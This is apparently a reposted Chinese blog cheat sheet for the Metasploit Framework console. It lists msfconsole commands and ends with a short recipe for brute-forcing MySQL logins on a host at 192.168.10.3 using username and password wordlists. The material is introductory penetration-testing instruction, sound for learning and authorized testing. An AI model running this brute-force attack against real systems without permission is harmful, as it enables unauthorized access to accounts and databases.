渗透测试-Metasploit
作者:互联网
Msf(the Matesploit Framework)基础
漏洞框架 方便强大 框架全球性exp poc 脚本利于测试
术语
运行
cd = back
ls = dir pwd
banner
color
connect 链接一个主机、网络
edit 编辑一个模块
exit 退出控制台
get 获取变量
getg 全局变量
go_pro 进入GUI ····有的版本没有
grep 输出命令
info 查看模块详细信息
irb drop 进脚本模块 ruby
jobs 显示 你使用 的 模块
kill 处理掉一个 项目进程
load 加载一些插件
loadpath 插件路径
quit 退出控制台
route 做跳板代理
save 保存活跃数据
search 搜索漏洞模块
sessions 选择会话 -i x (shell 反弹回来 选择序号)
set 设置 参数 RHOSTS 地址/网段
- 设置字典
unset
unsetg 全局重新设置
show options 查看配置选项
exploit 执行
db_connect 链接
db_disconnect 断开
db_export 导出
db_import 导入
db_nmap 扫描结果入库
service postgresql start
status
service metasploit start
msfconsole
- 扫描结果
msfconsole
search mysql
use auxiliary/scanner/mysql/mysql_login
set RHOST 192.168.10.3
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)
run 启动攻击,开始爆破
标签:Metasploit,插件,set,测试,渗透,db,模块,mysql,字典 来源: https://blog.csdn.net/qq_33608000/article/details/122510354